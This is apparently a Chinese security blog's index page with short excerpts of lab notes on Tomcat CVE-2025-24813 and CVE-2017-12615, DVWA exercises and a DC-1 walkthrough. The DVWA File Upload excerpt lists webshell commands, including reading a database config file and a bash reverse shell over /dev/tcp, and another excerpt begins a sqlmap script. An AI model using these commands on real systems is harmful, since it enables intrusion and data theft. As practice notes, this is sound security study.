CCLluvia - 博客园

2026年6月7日

Tomcat-CVE-2025-24813

摘要：原理： Tomcat在处理某些不完整PUT请求时存在缺陷 1.利用一个特制的PUT请求，将一个恶意序列化数据包上传到服务器的会话保存目录。 *漏洞利用：DefaultServlet里readonly=false 2.发送一个携带特定JSESSIONID Cookie的GET请求，诱使服务器反序列化之阅读全文

posted @ 2026-06-07 13:27 CCLluvia 阅读(4) 评论(0) 推荐(0)

DVWA-SQL Injection

摘要：后面就是在对应位置显示表名什么的一步步猜下去中级文本框变成下拉框或者上脚本用sqlmap !/bin/bash TARGET_URL="http://192.168.0.103:8080/vulnerabilities/sqli/" PHPSESSID="orlatscvk7pkupj0bqjh 阅读全文

posted @ 2026-06-07 11:06 CCLluvia 阅读(4) 评论(0) 推荐(0)

DVWA-Brute Force

摘要： Brute Force笔记更新下。阅读全文

posted @ 2026-06-07 10:31 CCLluvia 阅读(5) 评论(0) 推荐(0)

2026年6月6日

Tomcat-CVE-2017-12615

摘要：原理： CVE-2017-12615，是一个由配置错误和代码逻辑缺陷共同导致的文件上传漏洞。攻击者可以利用它向服务器上传一个恶意 JSP 脚本（WebShell），从而获得服务器的控制权限。 1.conf/web.xml里，DefaultServlet的readonly=false。这相当于开启了阅读全文

posted @ 2026-06-06 14:50 CCLluvia 阅读(3) 评论(0) 推荐(0)

DC-1练习

摘要：一、收集信息因为在一个网段，可以用arp-scan -l扫，后面显示VMware，Inc的就是 nmap扫一下 nmap -sV -p- 目标IP -sV: 探测服务版本 -p-: 扫描所有65535个端口。扫出来可以看到80开着用whatweb IP:80看下CMS。是Drupal7。查了阅读全文

posted @ 2026-06-06 12:06 CCLluvia 阅读(5) 评论(0) 推荐(0)

2026年6月5日

DVWA-File Upload

摘要：其他示例：列出文件 ?cmd=ls -la 查看系统信息找提权线索 ?cmd=uname -a 读取数据库配置 ?cmd=cat /var/www/html/config/config.inc.php 反弹shell ?cmd=bash -i >& /dev/tcp/ip/4444 0>&1 阅读全文

posted @ 2026-06-05 23:03 CCLluvia 阅读(4) 评论(0) 推荐(0)

DVWA-Inclusion Source

摘要： ![FI](https://img2024.cnblogs.com/blog/3806739/202606/3806739-20260605225421234-396086657.png) 阅读全文

posted @ 2026-06-05 22:54 CCLluvia 阅读(4) 评论(0) 推荐(0)

DVWA-CSRF

摘要： ![CSRF](https://img2024.cnblogs.com/blog/3806739/202606/3806739-20260605225213396-176864609.png) 阅读全文

posted @ 2026-06-05 22:52 CCLluvia 阅读(4) 评论(0) 推荐(0)

DVWA-Command Injection

摘要： ![CI](https://img2024.cnblogs.com/blog/3806739/202606/3806739-20260605224230862-840516843.png) 阅读全文

posted @ 2026-06-05 22:43 CCLluvia 阅读(4) 评论(0) 推荐(0)

公告